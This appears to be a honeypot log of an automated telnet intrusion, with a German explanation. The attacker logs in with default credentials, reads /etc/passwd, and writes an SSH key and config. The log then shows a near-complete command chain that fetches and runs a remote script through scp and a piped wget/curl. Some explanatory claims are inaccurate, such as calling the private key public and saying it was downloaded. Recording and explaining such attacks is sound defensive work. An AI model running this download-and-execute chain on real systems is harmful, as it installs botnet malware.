01.10.2026, 16:52 UTC · 16 Befehle · über telnet · Indonesien
user='admin' pass='admin' admin@srv01:~$ id uid=1000(admin) gid=1000(admin) groups=1000(admin) admin@srv01:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" auth_ok admin@srv01:~$ enable bash: enable: command not found admin@srv01:~$ system bash: system: command not found admin@srv01:~$ shell bash: shell: command not found admin@srv01:~$ sh admin@srv01:~$ bash admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- bash: syntax error near unexpected token `||' '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no bash: syntax error near unexpected token `newline' 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\… bash: syntax error near unexpected token `newline' redtail_bot_telnet_ok
Der Angreifer meldete sich über Telnet mit den Standardzugangsdaten admin und admin an. Nach einer kurzen Systemabfrage versuchte er, in eine tiefere Shell-Ebene zu wechseln. Anschließend lud er einen SSH-Schlüssel herunter und versuchte, eine Payload von einem externen Server zu beziehen und auszuführen.
Die Befehle id und cat /etc/passwd dienen der Identifikation des Benutzers und der Aufzählung lokaler Konten. Der Befehl echo erzeugt eine Datei mit einem öffentlichen SSH-Schlüssel im PEM-Format. Die Konfigurationsdatei sshcfg deaktiviert die Host-Key-Prüfung, um Man-in-the-Middle-Angriffe zu ermöglichen. Der scp-Befehl versucht, eine Datei über SSH zu übertragen, während wget oder curl als Fallback dienen, um eine Skriptdatei von einem IP-Server zu laden. Das Pipe-Zeichen leitet den Inhalt direkt an die Shell sh weiter, um das Skript ohne Zwischenspeicherung auszuführen.
Das Ziel war vermutlich die Installation einer Backdoor oder eines Botnet-Clients auf dem Gerät. Dies erkennt man an dem Versuch, eine externe Datei namens out_sh herunterzuladen und direkt auszuführen. Der Einsatz eines SSH-Schlüssels deutet auf einen Versuch hin, persistente Zugänge zu schaffen oder weitere Systeme im Netzwerk zu kompromittieren.
Dieses Muster ist bei automatisierten Botnetzen sehr verbreitet, die IoT-Geräte mit schwachen Passwörtern scannen. Die Kombination aus Standard-Credentials und direkter Payload-Ausführung ist ein klassischer Indikator für massenhafte Angriffe.